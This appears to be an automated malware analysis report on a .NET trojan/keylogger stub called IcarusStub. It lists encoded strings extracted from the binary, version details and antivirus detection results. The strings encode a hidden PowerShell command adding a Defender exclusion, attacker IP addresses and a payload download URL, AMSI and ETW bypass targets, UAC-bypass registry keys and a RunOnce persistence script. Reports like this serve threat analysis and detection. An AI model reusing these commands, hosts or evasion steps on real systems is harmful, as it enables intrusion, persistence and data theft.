cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVdpbmRvd1N0eWxlIEhpZGRlbiAtTm9Qcm9maWxlIC1Db21tYW5kIEFkZC1NcFByZWZlcmVuY2UgLUV4Y2x1c2lvblBhdGggJw==
RGVsZWdhdGVFeGVjdXRl
QzpcV2luZG93c1xTeXN0ZW0zMlxDb21wdXRlckRlZmF1bHRzLmV4ZQ==
NS43NS4xNjIuMjIx
RmFsc2U=
ODA4MQ==
SGlkZGVuRXllWl9DbGllbnQ=
bVBneEV4a0xF
JUxPR0Yl
JUhPT0sl
Y3Z0cmVz
aHR0cDovLzE5My4zMS4xMTYuMjM5L2NyeXB0L3B1YmxpYy9VcGRhdGVfRG93bmxvYWRzL3BhdGF0YS5qcGc=
XHN2Y2hvc3QuZXhl
XHN2Y2hvc3QuYmF0
REVMICIlfmYwIg==
bnRkbGwuZGxs
RXR3RXZlbnRXcml0ZQ==
YW1zaS5kbGw=
QW1zaVNjYW5CdWZmZXI=
Y21kLmV4ZQ==
dGFza2tpbGwgL0YgL0lNIA==
YXNkZmdoamtscXdlcnR5dWlvcG1uYnZjeHo=
Q2xhc3Nlcw==
Q2xhc3Nlc1xtcy1zZXR0aW5ncw==
Q2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbA==
Q2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVu
Q2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=
L2Mgc3RhcnQgY29tcHV0ZXJkZWZhdWx0cy5leGU=
bG9jYWxhcHBkYXRh
XEV4ZWN1dGlvbi52YnM=
b24gZXJyb3IgcmVzdW1lIG5leHQNCnNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCndzaFNoZWxsLlJlZ1dyaXRlICJIS0NVXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bk9uY2Vc
IiwgIg==
Ig0Kc2V0IGZpbGVzeXMgPSBDcmVhdGVPYmplY3QoIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IikNCmZpbGVzeXMuQ29weUZpbGUi
Ig0KSGlkZGVuU3RhcnRmaWxlc3lzLkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ==
ZXhwbG9yZXIuZXhl
U29mdHdhcmVc
YUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMGhwWkdSbGJrVjVaVm92ZEdjdmJXRnBiaTl5ZEM1cWNHYz0=
ezB9eHsxfQ==
U2VsZWN0ICogRnJvbSBXaW4zMl9Qcm9jZXNzIFdoZXJlIFBhcmVudFByb2Nlc3NJRD0=
UHJvY2Vzc0lE
U29mdHdhcmVcXDM2MFxcMzYwc2U2XFxDaHJvbWU=
dXNlcl9kYXRhX2Rpcg==
MzYwc2U=
RGVmYXVsdA==
SWNhcnVzU3R1Yi5Qcm9wZXJ0aWVzLlJlc291cmNlcw==
U3RyaW5nMQ==
asdfghjklqwertyuiopmnbvcxz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
IcarusStub
FileVersion
1.0.0.9
InternalName
net2.exe
LegalCopyright
Copyright
2022
LegalTrademarks
OriginalFilename
net2.exe
ProductName
IcarusStub
ProductVersion
1.0.0.9
Assembly Version
1.0.0.9
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
DrWeb Trojan.PackedNET.335
MicroWorld-eScan IL:Trojan.MSILZilla.11609
ClamAV Clean
FireEye Generic.mg.4c9bc0e73872ba91
CAT-QuickHeal Clean
McAfee Artemis!4C9BC0E73872
Cylance unsafe
VIPRE IL:Trojan.MSILZilla.11609
Sangfor Trojan.Win32.Save.a
K7AntiVirus Clean
BitDefender IL:Trojan.MSILZilla.11609
K7GW Clean
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta AI:Packer.DEFC9D481F
VirIT Clean
Cyren W32/MSIL_Troj.C.gen!Eldorado
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/GenKryptik.FYPC
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba TrojanSpy:MSIL/KeyLogger.b483f5fb
NANO-Antivirus Clean
ViRobot Clean
Rising Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:4SVdAeSJP3XDeu0MKZosRg)
Sophos Mal/Generic-S
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition GenericRXVL-IO!4C9BC0E73872
Trapmine suspicious.low.ml.score
CMC Clean
Emsisoft IL:Trojan.MSILZilla.11609 (B)
SentinelOne Static AI - Malicious PE
GData IL:Trojan.MSILZilla.11609
Jiangmin Clean
Webroot Clean
Avira Clean
MAX malware (ai score=84)
Antiy-AVL Clean
Gridinsoft Malware.Win32.Gen.bot
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D2D59
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft TrojanSpy:MSIL/KeyLogger.SRP!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5367154
Acronis suspicious
VBA32 Clean
ALYac IL:Trojan.MSILZilla.11609
TACHYON Clean
DeepInstinct MALICIOUS
Malwarebytes Crypt.Trojan.MSIL.DDS
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Win32.Trojan.Generic.Osmw
Yandex Clean
Ikarus Trojan-Spy.Agent
MaxSecure Trojan.Malware.121218.susgen
Fortinet Clean
AVG MSIL:Agent-FI [Trj]
Avast MSIL:Agent-FI [Trj]
No IRMA results available.